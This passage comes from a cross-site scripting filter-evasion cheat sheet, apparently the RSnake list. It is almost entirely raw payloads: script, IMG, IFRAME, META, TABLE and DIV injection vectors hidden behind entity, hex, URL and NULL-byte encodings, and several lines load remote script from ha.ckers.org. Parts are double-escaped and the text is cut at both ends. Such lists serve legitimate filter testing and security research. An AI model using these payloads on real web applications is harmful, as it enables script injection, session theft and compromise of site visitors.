HREF=\"http&amp;#58;//66&amp;#46;102&amp;#46;7&amp;#46;147/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//1113982867/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//0x42&amp;#46;0x0000066&amp;#46;0x7&amp;#46;0x93/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//0102&amp;#46;0146&amp;#46;0007&amp;#46;00000223/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"htt p&amp;#58;//6 6&amp;#46;000146&amp;#46;0x7&amp;#46;147/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"//www&amp;#46;google&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"//google\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org@google\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//google&amp;#58;ha&amp;#46;ckers&amp;#46;org\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//google&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//www&amp;#46;google&amp;#46;com&amp;#46;/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"javascript&amp;#058;document&amp;#46;location='http&amp;#58;//www&amp;#46;google&amp;#46;com/'\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt;A HREF=\"http&amp;#58;//www&amp;#46;gohttp&amp;#58;//www&amp;#46;google&amp;#46;com/ogle&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt; &amp;lt; %3C &lt &amp;lt; &LT &amp;LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &amp;lt; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &amp;#x3c; &amp;#x03c; &amp;#x003c; &amp;#x0003c; &amp;#x00003c; &amp;#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &amp;#X3c; &amp;#X03c; &amp;#X003c; &amp;#X0003c; &amp;#X00003c; &amp;#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &amp;#x3C; &amp;#x03C; &amp;#x003C; &amp;#x0003C; &amp;#x00003C; &amp;#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &amp;#X3C; &amp;#X03C; &amp;#X003C; &amp;#X0003C; &amp;#X00003C; &amp;#X000003C; \x3c \x3C \u003c \u003C &amp;lt;iframe src=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html&amp;gt; &amp;lt;IMG SRC=\"javascript&amp;#058;alert('XSS')\" &amp;lt;SCRIPT SRC=//ha&amp;#46;ckers&amp;#46;org/&amp;#46;js&amp;gt; &amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js?&amp;lt;B&amp;gt; &amp;lt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\");//&amp;lt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT/SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;BODY onload!#$%&*~+-_&amp;#46;,&amp;#58;;?@&amp;#91;/|\&amp;#93;^`=alert(\"XSS\")&amp;gt; &amp;lt;SCRIPT/XSS SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;IMG SRC=\"   javascript&amp;#058;alert('XSS');\"&amp;gt; perl -e 'print \"&amp;lt;SCR\0IPT&amp;gt;alert(\\"XSS\\")&amp;lt;/SCR\0IPT&amp;gt;\";' &amp;gt; out perl -e 'print \"&amp;lt;IMG SRC=java\0script&amp;#058;alert(\\"XSS\\")&amp;gt;\";' &amp;gt; out &amp;lt;IMG SRC=\"jav&amp;#x0D;ascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;IMG SRC=\"jav&amp;#x0A;ascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;IMG SRC=\"jav&amp;#x09;ascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&amp;gt; &amp;lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&amp;gt; &amp;lt;IMG SRC=javascript&amp;#058;alert('XSS')&amp;gt; &amp;lt;IMG SRC=javascript&amp;#058;alert(String&amp;#46;fromCharCode(88,83,83))&amp;gt; &amp;lt;IMG \"\"\"&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;\"&amp;gt; &amp;lt;IMG SRC=`javascript&amp;#058;alert(\"RSnake says, 'XSS'\")`&amp;gt; &amp;lt;IMG SRC=javascript&amp;#058;alert(&amp;quot;XSS&amp;quot;)&amp;gt; &amp;lt;IMG SRC=JaVaScRiPt&amp;#058;alert('XSS')&amp;gt; &amp;lt;IMG SRC=javascript&amp;#058;alert('XSS')&amp;gt; &amp;lt;IMG SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt; '';!--\"&amp;lt;XSS&amp;gt;=&{} ';alert(String&amp;#46;fromCharCode(88,83,83))//\';alert(String&amp;#46;fromCharCode(88,83,83))//\";alert(String&amp;#46;fromCharCode(88,83,83))//\\";alert(String&amp;#46;fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String&amp;#46;fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascrscriptipt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=" &amp;#14;  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')">  <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c